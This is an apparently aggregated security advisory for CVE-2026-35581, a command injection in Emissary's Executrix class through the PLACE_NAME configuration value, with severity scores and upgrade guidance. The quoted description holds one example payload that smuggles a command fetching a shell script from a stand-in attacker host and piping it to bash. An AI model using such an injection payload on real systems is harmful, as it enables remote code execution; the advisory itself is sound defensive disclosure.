Skip to content

← Actionable
High, CVSS 7.2

Emissary has a Command Injection via PLACE_NAME Configuration in Executrix

CVE-2026-35581GHSA-6c37-7w4p-jg9v

What to do

Vendor fix available. Upgrade each affected package to the fixed version on its release line (gov.nsa.emissary:emissary 8.39.0), redeploy, then verify what is actually installed.

This page has no inventory attached, so it cannot say whether you are affected. A vendor fix is not proof that your deployment is fixed.

Affected packages

Sources

Severity and exploitation
Exploitation
No confirmed exploitation recorded. Patch Next marks exploitation only from CISA KEV.
CVSS
7.2 · CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
EPSS
  • CVE-2026-35581: 0.56% estimated exploitation activity in the next 30 days; percentile 46.86 (FIRST EPSS, 2026-11-03). This is a model estimate, not proof of exploitation or customer exposure.
Source description

As published by the source; long descriptions are shortened.

Summary The Executrix utility class constructed shell commands by concatenating configuration-derived values — including the PLACENAME parameter — with insufficient sanitization. Only spaces were replaced with underscores, allowing shell metacharacters (;, |, $, , (, ), etc.) to pass through into /bin/sh -c command execution. Details Vulnerable code — Executrix.java Insufficient sanitization (line 132): Shell sink (line 1052–1058): Data flow 1. PLACENAME is read from a configuration file 2. Executrix applies only a space-to-underscore replacement 3. The placeName is used to construct temporary directory paths (tmpNames[DIR]) 4. tmpNames[DIR] is concatenated into a shell command string 5. The command is executed via /bin/sh -c Example payload After the original sanitization: test;curlattacker.com/shell.sh|bash;x (semicolons, pipes, and other metacharacters preserved) Impact - Arbitrary command execution on the Emissary host - Requires the ability to control configuration values (e.g.,…

Dates and revisions
Published by the source
Last modified by the source
Source last checked
  1. Revision 1 · created ·

    Published from ghsa record GHSA-6c37-7w4p-jg9v

Agent brief

Preview the exact text before you copy it. Commands are read-only suggestions; review them before running anything.

# Patch Next advisory brief: CVE-2026-35581

Advisory: Emissary has a Command Injection via PLACE_NAME Configuration in Executrix
IDs: CVE-2026-35581, GHSA-6c37-7w4p-jg9v
Record: https://patchnext.com/advisories/cve-2026-35581 (revision 1, source checked 26 Oct 2026, 16:45 UTC)
Inventory: none attached. This brief comes from a public page and does not say whether any deployment is affected.
Severity: High (CVSS 7.2)
Exploitation: no confirmed exploitation recorded. Patch Next confirms exploitation only from CISA KEV.
Vendor response: Vendor fix available; fixed versions by package: gov.nsa.emissary:emissary 8.39.0. A vendor fix does not mean a deployment is fixed.

## Affected components
- Maven gov.nsa.emissary:emissary: affected < 8.39.0; fixed in 8.39.0

## Suggested inspection (read-only)
- Maven gov.nsa.emissary:emissary: check the installed version with your package manager.

## Supported action
Upgrade each affected component to a fixed version on its release line. For a transitive dependency, upgrade the parent package or add an override or constraint, then regenerate the lockfile. Redeploy every environment that ran an affected version.

## Required regression checks
- Run the test suite and a production build.
- Exercise the features that depend on gov.nsa.emissary:emissary.
- Repeat the inspection and confirm that only fixed versions remain installed.

## Rollback considerations
- Keep the previous lockfile and deployment artifact. Rolling back reinstates the vulnerable version, so apply any documented mitigation while you fix forward.

## Unresolved questions
- Which deployments run an affected version?
- Exploitation status can change. Check again before lowering the priority.
- Mark the work resolved only after the fixed version is verified in production.

## Sources
- Verified: https://github.com/advisories/GHSA-6c37-7w4p-jg9v (GitHub-reviewed advisory GHSA-6c37-7w4p-jg9v lists affected ranges: Maven gov.nsa.emissary:emissary >=0 <8.39.0)

Commands are suggestions: review each one before running it.

Loading voting…